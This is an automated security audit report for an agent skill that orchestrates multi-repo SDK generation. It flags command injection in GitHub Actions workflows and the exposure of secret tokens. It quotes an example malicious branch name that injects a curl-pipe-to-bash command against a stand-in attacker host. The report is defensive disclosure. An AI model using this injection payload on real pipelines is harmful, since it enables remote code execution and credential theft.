Skills
skills/speakeasy-api/skills/orchestrate-multi-repo-sdks/Gen Agent Trust Hub

orchestrate-multi-repo-sdks

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Shell command injection via untrusted GitHub metadata.
  • Ingestion points: github.event.pull_request.head.ref in reconcile-prs.yaml and inputs.feature_branch in sdk_generation.yaml.
  • Capability inventory: Execution of arbitrary shell commands via the GitHub Actions runner.
  • Details: The workflows interpolate untrusted branch names directly into run blocks using ${{ ... }} syntax. An attacker can create a branch named \"; curl http://attacker.com | bash; #\" to execute code within the CI environment.
  • [DATA_EXFILTRATION] (HIGH): Exposure of high-privilege secrets.
  • Evidence: GH_TOKEN: ${{ secrets.SDK_REPOS_PAT }} and SPEAKEASY_API_KEY: ${{ secrets.SPEAKEASY_API_KEY }}.
  • Details: The vulnerable jobs have access to powerful credentials, including a Personal Access Token with repo scope. An attacker exploiting the command injection can exfiltrate these tokens, leading to full compromise of the connected repositories.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 03:07 AM